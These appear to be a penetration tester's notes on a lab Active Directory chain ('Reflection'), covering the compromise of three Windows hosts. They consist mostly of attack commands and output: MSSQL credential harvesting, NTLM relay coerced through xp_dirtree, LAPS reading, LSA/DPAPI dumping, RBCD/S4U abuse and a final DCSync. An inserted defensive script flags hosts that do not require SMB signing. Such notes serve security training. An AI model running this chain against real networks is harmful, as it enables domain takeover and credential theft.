Reflection (Chain)
This is not a writeup, just my notes about the machine.

Operating System: Microsoft Windows Server 2022 Standard
Chain: True (3 Machines)
Credentials
Username      Password         Source                Access
web_staging   Washroom510      Leaked on SMB Folder  Domain User/MSSQL on MS01
dev01         Initial123       MSSQL                 User on MS01
dev02         Initial123       MSSQL                 User on MS01
web_prod      Tribesman201     NTLM Relay            MSSQL user on DC01
abbie.smith   CMe1x+nlRaaWEw   MSSQL                 Domain User
dorothy.rose  hC_fny3OK9glSJ   MSSQL                 Domain User
Rhys.Garner   knh1gJ8Xmeq+uP   LSA                   Domain User
✅ Valid Usernames
web_staging
dorothy.rose
abbie.smith
web_prod
Rhys.Garner
🔑 Passwords list
Washroom510
Initial123
Tribesman201
CMe1x+nlRaaWEw
hC_fny3OK9glSJ
knh1gJ8Xmeq+uP
Information Gathering
Nmap scan
Nmap scan report for 10.10.241.133
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58981/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Nmap scan report for 10.10.241.134
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Nmap scan report for 10.10.241.135
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Service enumeration
10.10.241.133
SMB
Domain SID: S-1-5-21-3375389138-1770791787-1490854311
Netbios: DC01
FQDN: dc01.reflection.vl
Domain: reflection.vl
Parent Domain
Allows null session authentication
signing: False
DNS
Not vulnerable to AXFR
10.10.241.134
SMB (enum4linux-ng)
Server allows null session authentication
Server allows guest session authentication
FQDN: ms01.reflection.vl
signing: False
10.10.241.135
SMB
FQDN: ws01.reflection.vl
signing: False
Compromising MS01
Discovering valid credentials
❯ nxc smb 10.10.241.134 -u 'Intrusionz3r0' -p '' --shares -M spider_plus
SMB 10.10.241.134 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.241.134 445 MS01 [+] reflection.vl\Intrusionz3r0: (Guest)
SPIDER_PLUS 10.10.241.134 445 MS01 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.241.134 445 MS01 [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.241.134 445 MS01 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.241.134 445 MS01 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.241.134 445 MS01 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.241.134 445 MS01 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.241.134 445 MS01 [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.241.134 445 MS01 [*] Enumerated shares
SMB 10.10.241.134 445 MS01 Share Permissions Remark
SMB 10.10.241.134 445 MS01 ----- ----------- ------
SMB 10.10.241.134 445 MS01 ADMIN$ Remote Admin
SMB 10.10.241.134 445 MS01 C$ Default share
SMB 10.10.241.134 445 MS01 IPC$ READ Remote IPC
SMB 10.10.241.134 445 MS01 staging READ staging environment
SPIDER_PLUS 10.10.241.134 445 MS01 [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.241.134.json".
SPIDER_PLUS 10.10.241.134 445 MS01 [*] SMB Shares: 4 (ADMIN$, C$, IPC$, staging)
SPIDER_PLUS 10.10.241.134 445 MS01 [*] SMB Readable Shares: 2 (IPC$, staging)
SPIDER_PLUS 10.10.241.134 445 MS01 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.241.134 445 MS01 [*] Total folders found: 0
SPIDER_PLUS 10.10.241.134 445 MS01 [*] Total files found: 1
SPIDER_PLUS 10.10.241.134 445 MS01 [*] File size average: 50 B
❯ cat staging_db.conf
user=web_staging
password=Washroom510
db=staging%
Connecting to MSSQL and discovering valid user credentials
❯ impacket-mssqlclient ms01.reflection.vl/web_staging:'Washroom510'@10.10.241.134
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (web_staging guest@master)>
SQL (web_staging guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
-------
master
tempdb
model
msdb
staging
SQL (web_staging guest@master)> use staging;
SQL (web_staging dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
staging dbo users b'BASE TABLE'
SQL (web_staging dbo@staging)> select * from users
id username password
-- -------- -------------
1 b'dev01' b'Initial123'
2 b'dev02' b'Initial123'
SQL (web_staging dbo@staging)>
NTLM Relay Attack via SOCKS proxy
The previous enumeration showed that SMB signing was not required on the servers (signing: False), making them vulnerable to NTLM relay attacks.
Setting up the ntlmrelayx tool to obtain an interactive shell.
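An added example (not part of the original notes): a small Python audit that parses NetExec SMB banner lines in the format seen above and lists every host reporting signing:False, the condition that let the relay to DC01 succeed. The FILE01 host and its address are constructed to show what a hardened entry looks like.

```python
"""Audit nxc SMB banners for hosts that do not require SMB signing."""
import re

# Constructed sample in the nxc format used in these notes. The three
# reflection.vl hosts mirror the notes; FILE01 / 10.10.99.1 is made up to
# show a host where signing is required. The last line is a non-banner line.
SAMPLE_NXC_OUTPUT = """\
SMB 10.10.210.215 445 WS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.213 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.99.1 445 FILE01 [*] Windows Server 2022 Build 20348 x64 (name:FILE01) (domain:reflection.vl) (signing:True) (SMBv1:False)
SMB 10.10.210.213 445 DC01 [*] Enumerated shares
"""

# One banner line: "SMB <ip> <port> <host> [*] <os> (name:..) (domain:..) (signing:..) (SMBv1:..)"
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+\S+\s+\[\*\]\s+(?P<os>.*?)\s+"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_banners(text):
    """Return one dict per banner line; lines that are not banners are skipped."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line.strip())
        if not m:
            continue
        hosts.append({"ip": m["ip"], "name": m["name"], "domain": m["domain"],
                      "os": m["os"], "signing": m["signing"] == "True",
                      "smbv1": m["smbv1"] == "True"})
    return hosts


def relay_exposed(hosts):
    """Hosts that accept unsigned SMB sessions, i.e. valid NTLM relay targets."""
    return [h for h in hosts if not h["signing"]]


def report(text):
    """Human-readable summary with the server-side setting to enforce."""
    hosts = parse_banners(text)
    exposed = relay_exposed(hosts)
    out = [f"{len(hosts)} SMB hosts parsed, {len(exposed)} do not require signing"]
    for h in exposed:
        # LanmanServer\Parameters\RequireSecuritySignature=1 is the GPO
        # "Microsoft network server: Digitally sign communications (always)".
        out.append(f"  {h['name']:<7} {h['ip']:<15} {h['domain']} -> set RequireSecuritySignature=1")
    return "\n".join(out)


if __name__ == "__main__":
    print(report(SAMPLE_NXC_OUTPUT))
```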
❯ sudo impacket-ntlmrelayx -smb2support -t 10.10.241.133 -i
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
Triggering the authentication to perform the relay
SQL (web_staging guest@master)> exec xp_dirtree '\\10.8.5.48\smbfolder'
Output from impacket-ntlmrelayx tool.
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.241.134, attacking target smb://10.10.241.133
[*] Authenticating against smb://10.10.241.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
Downloading the production database user's configuration file.
❯ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# ls
drw-rw-rw- 0 Wed Jun 7 13:44:26 2023 .
drw-rw-rw- 0 Wed Jun 7 13:43:22 2023 ..
-rw-rw-rw- 45 Thu Jun 8 07:24:39 2023 prod_db.conf
# get prod_db.conf
❯ catn prod_db.conf
user=web_prod
password=Tribesman201
db=prod%
Discovering user credentials in the MSSQL table
❯ impacket-mssqlclient ms01.reflection.vl/web_prod:'Tribesman201'@10.10.241.133
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
SQL (web_prod guest@master)> SELECT name FROM master.dbo.sysdatabases;
prod
SQL (web_prod guest@master)> use prod;
SQL (web_prod dbo@prod)> select * from prod.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
prod dbo users b'BASE TABLE'
SQL (web_prod dbo@prod)> select * from users;
id name password
-- --------------- -----------------
1 b'abbie.smith' b'CMe1x+nlRaaWEw'
2 b'dorothy.rose' b'hC_fny3OK9glSJ'
SQL (web_prod dbo@prod)>
With valid credentials, the tester proceeded to enumerate the domain controller using BloodHound.
Reading LAPS password on MS01

The user abbie.smith possesses GenericAll over MS01, which means the user can abuse this machine either via RBCD or by reading its LAPS password. (RBCD was not possible because MachineAccountQuota is 0.)
❯ bloodyAD --dc-ip 10.10.241.133 -d reflection.vl -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' get object 'MS01$' --attr ms-Mcs-AdmPwd
distinguishedName: CN=MS01,OU=servers,DC=reflection,DC=vl
ms-Mcs-AdmPwd: H447.++h6g5}xi
Dumping DPAPI and LSA credentials on MS01
❯ nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --lsa
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB 10.10.210.214 445 MS01 [+] Dumping LSA secrets
<SNIP>
SMB 10.10.210.214 445 MS01 REFLECTION\svc_web_staging:DivinelyPacifism98
❯ nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --dpapi
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB 10.10.210.214 445 MS01 [*] Collecting User and Machine masterkeys, grab a coffee and be patient...
SMB 10.10.210.214 445 MS01 [+] Got 10 decrypted masterkeys. Looting secrets...
SMB 10.10.210.214 445 MS01 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370} - REFLECTION\Georgia.Price:DBl+5MPkpJg5id
Compromising WS01

Abusing Resource-Based Constrained Delegation
❯ impacket-rbcd -delegate-from 'MS01$' -delegate-to 'WS01$' -action 'write' 'REFLECTION.vl/Georgia.Price:DBl+5MPkpJg5id'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] MS01$ (S-1-5-21-3375389138-1770791787-1490854311-1104)
Requesting a service ticket via S4U2self/S4U2proxy
❯ impacket-getST -spn 'cifs/ws01.reflection.vl' -impersonate 'administrator' 'reflection.vl/MS01$' -hashes :c4b7d1086f04073b2b2f71cb075b3d52 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache
Authenticating to WS01 as NT AUTHORITY\SYSTEM
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-smbexec -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
Dumping SAM and LSA Secrets
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-secretsdump -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
<SNIP>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
Compromising Domain Controller (DC01)

During enumeration, the tester discovered a user named DOM_RGARNER, which looked similar to the previously obtained username Rhys.Garner. The tester then used NetExec to check whether the credentials were reused.
❯ nxc smb 10.10.210.213-215 -u 'dom_rgarner' -p 'knh1gJ8Xmeq+uP'
SMB 10.10.210.215 445 WS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.213 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.215 445 WS01 [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)
SMB 10.10.210.214 445 MS01 [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)
SMB 10.10.210.213 445 DC01 [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)
Performing a DCSync attack to compromise reflection.vl
❯ impacket-getTGT reflection.vl/dom_rgarner:'knh1gJ8Xmeq+uP'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in dom_rgarner.ccache
❯ KRB5CCNAME='dom_rgarner.ccache' impacket-secretsdump -k -no-pass dc01.reflection.vl -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a87a3e893c70111c8cad0ecbda9f4002:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2d2ca00cb0d7484b07eba9b00937b9e8a537089e69bbd4a8551dbad0ecae5993
Administrator:aes128-cts-hmac-sha1-96:da61094f6772529865c6b58d0ac3e1df
Administrator:des-cbc-md5:34f23e130d7aa77f